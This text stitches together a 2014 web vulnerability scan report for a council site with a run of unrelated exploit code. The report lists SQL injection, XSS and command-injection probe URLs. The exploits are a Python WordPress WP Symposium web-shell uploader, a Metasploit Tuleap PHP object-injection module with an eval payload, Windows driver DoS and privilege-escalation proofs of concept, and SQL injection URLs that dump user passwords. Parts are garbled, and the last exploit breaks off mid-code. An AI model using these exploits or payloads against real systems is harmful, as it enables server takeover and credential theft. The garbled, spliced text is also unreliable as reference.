/pages/themes.php?lastlevelchange=%7C%20ping%20n%203%20127.0.0.1%20%7C
References:
CWE: 20
CWE: 713
CWE: 722
CWE: 727
CWE: 74
CWE: 77
CWE: 78
–-----------------------------------------------------------------------------------------------------
Vulnerability: 43160
Name: CGI Generic SQL Injection (blind, time based)
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 4
Risk: 40
CVSS Base Score: 7.5
Description
By sending specially crafted parameters to one or more CGI scripts
hosted on the remote web server, Nessus was able to get a slower
response, which suggests that it may have been able to modify the
behavior of the application and directly access the underlying
database.
An attacker may be able to exploit this issue to bypass
authentication, read confidential data, modify the remote database, or
even take control of the remote operating system.
Note that this script is experimental and may be prone to false positives.
Solution:
Modify the affected CGI scripts so that they properly escape arguments.
Information:
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to blind SQL injection
(time based) :
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
/pages/themes.php?lastlevelchange='%20AND%200%20IN%20(SELECT%20SLEEP(3))%20%20
/pages/themes.php?lastlevelchange=';WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange=');WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange='));WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange=';SELECT%20pg_sleep(3);
/pages/themes.php?lastlevelchange=');SELECT%20pg_sleep(3);
/pages/themes.php?lastlevelchange='));SELECT%20pg_sleep(3);
Clicking directly on these URLs should exhibit the issue :
(you will probably need to read the HTML source)
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
References
CWE: 20
CWE: 713
CWE: 722
CWE: 727
CWE: 751
CWE: 77
CWE: 801
CWE: 810
CWE: 89
–---------------------------------------------------------------------------------------------------------------
Vulnerability: 55903
Name: CGI Generic XSS (extended patterns)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 4.3
Description
The remote web server hosts one or more CGI scripts that fail to
adequately sanitize request strings with malicious JavaScript. By
leveraging this issue, an attacker may be able to cause arbitrary HTML
and script code to be executed in a user's browser within the security
context of the affected site. These XSS vulnerabilities are likely to
be 'nonpersistent' or 'reflected'.
Solution
Restrict access to the vulnerable application. Contact the vendor for
a patch or upgrade.
Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to crosssite scripting+
The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=504%20onerror="alert(504);
output
(extended patterns) :
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
a>
/pages/preview.php?sort=&sort=504%20onerror="alert(504);
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
a>
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=504%20onerror="alert(504);
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=504 o
nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
ew</a>
/pages/preview.php?order_by=&order_by=504%20onerror="alert(504);
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=504 o
nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
ew</a>
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=504%20onerror="alert(504);&search=&order_by=&fro
m=
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
a>
/pages/preview.php?sort=&sort=504%20onerror="alert(504);&search=&order_b
y=&from=
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
a>
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=&search=&order_by=504%20onerror="alert(504);&fro
m=
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=504 o
nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
Tonbridge & Malling Borough Council
Vulnerabilities Report | 5
a>
/pages/preview.php?sort=&search=&order_by=&order_by=504%20onerror="alert
(504);&from=
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=504 o
nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
a>
Clicking directly on these URLs should exhibit the issue :
(you will probably need to read the HTML source)
/pages/preview.php?sort=504%20onerror="alert(504);
/pages/preview.php?order_by=504%20onerror="alert(504);
References
CWE: 116
CWE: 20
CWE: 442
CWE: 692
CWE: 712
CWE: 722
CWE: 725
CWE: 74
CWE: 751
CWE: 79
CWE: 80
CWE: 801
CWE: 81
CWE: 811
CWE: 83
CWE: 86
–----------------------------------------------------------------------------------------------------
Vulnerability: 49067
Name: CGI Generic HTML Injections (quick test)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0
Description
The remote web server hosts CGI scripts that fail to adequately sanitize
request strings with malicious JavaScript. By leveraging this issue,
an attacker may be able to cause arbitrary HTML to be executed
inuser's browser within the security context of the affected site.
The remote web server may be vulnerable to IFRAME injections or
crosssite scripting attacks :
IFRAME injections allow 'virtual defacement' that
might scare or anger gullible users. Such injections
are sometimes implemented for 'phishing' attacks.
XSS are extensively tested by four other scripts.
Some applications (e.g. web forums) authorize a subset
of HTML without any ill effect. In this case, ignore
this warning.
Solution
Either restrict access to the vulnerable application or contact the
vendor for an update.
Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to HTML injection :
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<"jfunqd%20>
output
a
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<"jfunqd >&archive=&k=">< Back to resource view</a>
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=<"jfunqd%20>
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=<"jfu
nqd >&sort=DESC&archive=&k=">< Back to resource view</a>
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<"jfunqd%20>&search=&order_by=&from=
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<"jfunqd >&archive=&k=">< Back to resource view</a>
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=&search=&order_by=<"jfunqd%20>&from=
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=<"jfu
nqd >&sort=&archive=&k=">< Back to resource view</a>
Clicking directly on these URLs should exhibit the issue :
(you will probably need to read the HTML source)
/pages/preview.php?sort=<"jfunqd%20>
/pages/preview.php?order_by=<"jfunqd%20>
References
CWE: 80
CWE: 86
–---------------------------------------------------------------------------------------------------
Vulnerability: SC1628
Name: SSL cookie without secure flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/https:443
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1
Description
If the secure flag is not set, then the cookie will be transmitted in
cleartext if the user visits any non SSL
(HTTP) URLs within the cookie's scope.
Solution
The secure flag should be set on all cookies that are used for
transmitting sensitive data when accessing
content over HTTPS.
If cookies are used to transmit session tokens, then areas of the
application that are accessed over HTTPS
should employ their own session handling mechanism, and the session
tokens used should never be
transmitted over unencrypted communications.
Information
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:11 GMT
URI: /pages/search.php
Other Info: display=thumbs; httponly
URI: /pages/themes.php
Other Info: saved_themes_order_by=name; httponly
URI: /pages/user_password.php
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:53:08 GMT; httponly
URI: /pages/user_password.php
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:54:30 GMT; httponly
URI: /pages/user_request.php
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:53:07 GMT; httponly
URI: /pages/user_request.php
Other Info: starsearch=deleted; expires=Tue, 12Nov2013 01:54:25 GMT; httponly
–-------------------------------------------------------------------------------
Vulnerability: 44136
Name: CGI Generic Cookie Injection Scripting
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0
Description
The remote web server hosts at least one CGI script that fails to
adequately sanitize request strings with malicious JavaScript.
By leveraging this issue, an attacker may be able to inject arbitrary
cookies. Depending on the structure of the web application, it may be
possible to launch a 'session fixation' attack using this mechanism.
Please note that :
Nessus did not check if the session fixation attack is
feasible.
This is not the only vector of session fixation.
Solution
Restrict access to the vulnerable application. Contact the vendor
for a patch or upgrade.
Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to cookie manipulation :
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<script>document.cookie="testshay=5812;"</script
>
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs
p;Back to resource view</a>
/pages/preview.php?sort=&sort=<script>document.cookie="testshay=5812;"</
script>
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs
p;Back to resource view</a>
References
CWE: 472
CWE: 642
CWE: 715
CWE: 722
–--------------------------------------------------------------------------------------------
Vulnerability: 39466
Name: CGI Generic XSS (quick test)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0
Description
The remote web server hosts CGI scripts that fail to adequately sanitize
request strings with malicious JavaScript. By leveraging this issue,
an attacker may be able to cause arbitrary HTML and script code
to be executed in a user's browser within the security context of the
affected site.
These XSS are likely to be 'non persistent' or 'reflected'.
Solution
Restrict access to the vulnerable application. Contact the vendor
for a patch or upgrade.
Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to crosssite scripting
(quick+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=<IMG%20SRC="javascript:alert(104);">
output
test) :
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=<IMG
SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
esource view</a>
/pages/preview.php?order_by=&order_by=<IMG%20SRC="javascript:alert(104);
">
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=<IMG
SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
esource view</a>
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<IMG%20SRC="javascript:alert(104);">
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
rce view</a>
/pages/preview.php?sort=&sort=<IMG%20SRC="javascript:alert(104);">
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
rce view</a>
References
CWE: 116
CWE: 20
CWE: 442
CWE: 692
CWE: 712
CWE: 722
CWE: 725
CWE: 74
CWE: 751
CWE: 79
CWE: 80
CWE: 801
CWE: 81
CWE: 811
CWE: 83
CWE: 86
–--------------------------------------------------------------------------------------------------------------
Also issues to be aware of:
Vulnerability: SC1629
Name: Cookie without HttpOnly flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/https:443
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1
Description
When the HttpOnly attribute is set on a cookie, then the cookies
value cannot be read or set by clientside
JavaScript.
HttpOnly prevent certain clientside attacks, such as Cross Site
Scripting (XSS), from capturing the cookies
value via an injected script. When HttpOnly is set, script access to
document.cookie results in a blank string
being returned.
Solution
HttpOnly can safely be set for all Cookie values, unless the
application has a specific need for Script access
to cookie contents (which is highly unusual).
Please note also that HttpOnly does not mitigate against all dangers
of Cross Site Scripting any XSS
vulnerabilities identified must still be fixed.
Information
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:11 GMT
–-------------------------------------------------------------------------------
Vulnerability: SC1629
Name: Cookie without HttpOnly flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/http:80
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1
Description
When the HttpOnly attribute is set on a cookie, then the cookies
value cannot be read or set by clientside JavaScript.
HttpOnly prevent certain clientside attacks, such as Cross Site
Scripting (XSS), from capturing the cookies value via an injected
script. When HttpOnly is set, script access to document.cookie results
in a blank string being returned.
Solution
HttpOnly can safely be set for all Cookie values, unless the
application has a specific need for Script access
to cookie contents (which is highly unusual).
Please note also that HttpOnly does not mitigate against all dangers
of Cross Site Scripting any XSS vulnerabilities identified must
still be fixed.
Information
URI: /pages/collection_share.php
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:42 GMT
URI: /pages/contactsheet_settings.php
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:38 GMT
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:53:05 GMT
URI: /pages/preview.php
Other Info: thumbs=hide; expires=Tue, 08Aug2017 01:57:55 GMT
URI: /pages/resource_email.php
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:57:42 GMT
URI: /pages/view.php
Other Info: thumbs=show; expires=Tue, 08Aug2017 01:57:45 GMT
#!/usr/bin/python
#
# Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
#
#
# Vulnerability discovered by Claudio Viviani
#
# Exploit written by Claudio Viviani
#
#
# 2014-11-27: Discovered vulnerability
# 2014-12-01: Vendor Notification (Twitter)
# 2014-12-02: Vendor Notification (Web Site)
# 2014-12-04: Vendor Notification (E-mail)
# 2014-12-11: No Response/Feedback
# 2014-12-11: Published
#
# Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
#
# --------------------------------------------------------------------
#
# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
#
# if ($_FILES["file"]["error"] > 0) {
# echo "Error: " . $_FILES["file"]["error"] . "<br>";
# } else {
# $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
# //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
# $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
# //echo "Extension: " . $ext . "<br />";
# if (strpos($allowedExts, $ext)) {
# $extAllowed = true;
# } else {
# $extAllowed = false;
# }
# //echo "Type: " . $_FILES["file"]["type"] . "<br>";
# //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
# //echo "Stored in: " . $_FILES["file"]["tmp_name"];
#
# if (!$extAllowed) {
# echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
# } else {
# // Copy file to tmp location
# ...
# ...
# ...
#
# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension
#
# The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/"
#
# ---------------------------------------------------------------------
#
# Dork google: index of "wp-symposium"
#
#
# Tested on BackBox 3.x with python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
# File management
import os, os.path, mimetypes
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
# Check if file exists and has readable
def checkfile(file):
if not os.path.isfile(file) and not os.access(file, os.R_OK):
print '[X] '+file+' file is missing or not readable'
sys.exit(1)
else:
return file
# Get file's mimetype
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
# Create multipart header
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
getfields = dict()
getfields['uploader_uid'] = '1'
getfields['uploader_dir'] = './'+randDirName
getfields['uploader_url'] = url_symposium_upload
payloadcontent = open(payloadname).read()
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
CRLF = '\r\n'
L = []
for (key, value) in getfields.items():
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
L.append('Content-Type: %s' % get_content_type(payloadname))
L.append('')
L.append(payloadcontent)
L.append('--' + LIMIT + '--')
L.append('')
body = CRLF.join(L)
return body
banner = """
___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | |__|
|::.|:. |
`--- ---'
___ ___ _______ _______ __
| Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------.
|. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | |
|. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__|
|: |: | |: 1 |_____| |__|
|::.|:. |::.| |::.. . |
`--- ---`---' `-------'
Wp-Symposium
Sh311 Upl04d Vuln3r4b1l1ty
v14.11
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option('-f', '--file', action="store",
help="Insert file name, ex: shell.php",
)
commandList.add_option('--timeout', action="store", default=10, type="int",
help="[Timeout Value] - Default 10",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.file:
print(banner)
commandList.print_help()
sys.exit(1)
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
print(banner)
socket.setdefaulttimeout(timeout)
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
randDirName = id_generator()
randShellName = id_generator()
bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'content-type': content_type,
'content-length': str(len(bodyupload)) }
try:
req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
response = urllib2.urlopen(req)
read = response.read()
if "error" in read or read == "0" or read == "":
print("[X] Upload Failed :(")
else:
print("[!] Shell Uploaded")
print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
except urllib2.HTTPError as e:
print("[X] "+str(e))
except urllib2.URLError as e:
print("[X] Connection Error: "+str(e))
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Tuleap PHP Unserialize Code Execution',
'Description' => %q{
This module exploits a PHP object injection vulnerability in Tuelap <= 7.6-4 which could be
abused to allow authenticated users to execute arbitrary code with the permissions of the
web server. The dangerous unserialize() call exists in the 'src/www/project/register.php'
file. The exploit abuses the destructor method from the Jabbex class in order to reach a
call_user_func_array() call in the Jabber class and call the fetchPostActions() method from
the Transition_PostAction_FieldFactory class to execute PHP code through an eval() call. In
order to work, the target must have the 'sys_create_project_in_one_step' option disabled.
},
'License' => MSF_LICENSE,
'Author' => 'EgiX',
'References' =>
[
['CVE', '2014-8791'],
['OSVDB', '115128'],
['URL', 'http://karmainsecurity.com/KIS-2014-13'],
['URL', 'https://tuleap.net/plugins/tracker/?aid=7601']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Generic (PHP Payload)', {}]],
'DisclosureDate' => 'Nov 27 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "The base path to the web application", "/"]),
OptString.new('USERNAME', [true, "The username to authenticate with" ]),
OptString.new('PASSWORD', [true, "The password to authenticate with" ]),
OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),
Opt::RPORT(443)
], self.class)
end
def check
flag = rand_text_alpha(rand(10)+20)
res = exec_php("print #{flag};")
if res and res.body and res.body.to_s =~ /#{flag}/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def do_login()
print_status("#{peer} - Logging in...")
username = datastore['USERNAME']
password = datastore['PASSWORD']
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'account/login.php'),
'vars_post' => {'form_loginname' => username, 'form_pw' => password}
})
unless res && res.code == 302
fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}")
end
print_status("#{peer} - Login successful with #{username}:#{password}")
res.get_cookies
end
def exec_php(php_code)
session_cookies = do_login()
chain = 'O:6:"Jabbex":2:{S:15:"\00Jabbex\00handler";O:12:"EventHandler":1:{S:27:"\00EventHandler\00authenticated";b:1;}'
chain << 'S:11:"\00Jabbex\00jab";O:6:"Jabber":3:{S:8:"_use_log";i:1;S:11:"_connection";O:5:"Chart":0:{}S:15:"_event_handlers";'
chain << 'a:1:{S:9:"debug_log";a:2:{i:0;O:34:"Transition_PostAction_FieldFactory":1:{S:23:"\00*\00post_actions_classes";'
chain << 'a:1:{i:0;S:52:"1;eval(base64_decode($_SERVER[HTTP_PAYLOAD]));die;//";}}i:1;S:16:"fetchPostActions";}}}}'
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'project/register.php'),
'cookie' => session_cookies,
'vars_post' => {'data' => chain},
'headers' => {'payload' => Rex::Text.encode_base64(php_code)}
}, 3)
end
def exploit
print_status("#{peer} - Exploiting the PHP object injection...")
exec_php(payload.encoded)
end
end
/*
Exploit Title - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
Date - 19th January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.malwarebytes.org
Tested Version - 1.03.1.1220, 1.04.1.1012
Driver Version - no version set - mbae.sys
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB - http://www.osvdb.org/show/osvdb/114249
CVE ID - CVE-2014-100039
Vendor fix url - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
Fixed version - 1.05
Fixed driver ver - no version set
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 25
int main(int argc, char *argv[])
{
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
BYTE sizebytes[4] = "\xff\xff\xff\x00";
BYTE *inbuffer;
printf("-------------------------------------------------------------------------------\n");
printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n");
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");
inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(inbuffer, 0x41, BUFSIZE);
memcpy(inbuffer, sizebytes, sizeof(sizebytes));
printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to DoS . . .");
getch();
DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
printf("\n[+] DoS buffer sent\n\n");
CloseHandle(hDevice);
return 0;
}
source: https://www.securityfocus.com/bid/48689/info
The 'com_hospital' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_hospital&view=departments&Itemid=21&did=[SQL INJECTION]
source: https://www.securityfocus.com/bid/48688/info
The Juicy Gallery component for Joomla! is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_juicy&task=showComments&picId=[EXPLOIT]
source: https://www.securityfocus.com/bid/48687/info
The Auerswald USB Device Driver for the Linux kernel is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code with superuser privileges, facilitating the complete compromise of affected computers. Failed exploit attempts will likely crash the kernel, denying service to legitimate users.
Linux kernel 2.6.26 is vulnerable; prior versions may also be affected.
0xbf, 0x09, /* u16 idVendor; */
0xc0, 0x00, /* u16 idProduct; */
0x10, 0x42, /* u16 bcdDevice */
case 1:
/* serial number */
ret = set_usb_string(data, ��);
break;
case 2:
ret = set_usb_string(data,�AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�);
source: https://www.securityfocus.com/bid/48685/info
The 'Foto' component for Joomla! is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_foto&task=categoria&id_categoria=-4+union+select+1,password,username,4,5,6,7+from+jos_users--
/*
Exploit Title - McAfee Data Loss Prevention Endpoint Arbitrary Write Privilege Escalation
Date - 29th January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.mcafee.com
Tested Version - 9.3.200.23
Driver Version - 9.3.200.23 - hdlpctrl.sys
Tested on OS - 32bit Windows XP SP3 and Windows 2003 Server SP2
OSVDB - http://www.osvdb.org/show/osvdb/117345
CVE ID - CVE-2015-1305
Vendor fix url - https://kc.mcafee.com/corporate/index?page=content&id=SB10097
Fixed version - 9.3.400
Fixed driver ver -
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
DWORD ProfileSource,
PULONG Interval);
typedef void (*FUNCTPTR)();
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
